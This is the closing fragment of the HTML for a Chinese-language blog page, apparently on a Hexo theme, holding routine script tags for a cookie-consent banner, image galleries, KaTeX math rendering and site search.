        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/cookieconsent/3.1.1/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/js/lightgallery.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/KaTeX/0.11.1/katex.min.css"><script src="https://cdnjs.loli.net/ajax/libs/KaTeX/0.11.1/katex.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/KaTeX/0.11.1/contrib/auto-render.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/KaTeX/0.11.1/contrib/mhchem.js" defer></script><script>window.addEventListener("load", function() {
            document.querySelectorAll('[role="article"] > .content').forEach(function(element) {
                renderMathInElement(element);
            });
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>